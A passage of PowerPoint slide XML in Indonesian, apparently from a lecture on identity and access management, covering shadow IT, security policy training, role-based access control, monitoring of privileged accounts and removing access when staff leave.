              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pekerjaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (shadow IT).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kesadaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengajaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadwalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembelajaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontraktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penetapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> tag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pencabutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialokasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meninggalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontraktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proyek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selesai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghapusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun. Akun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihapus</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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6420497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Atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akun dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Akun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
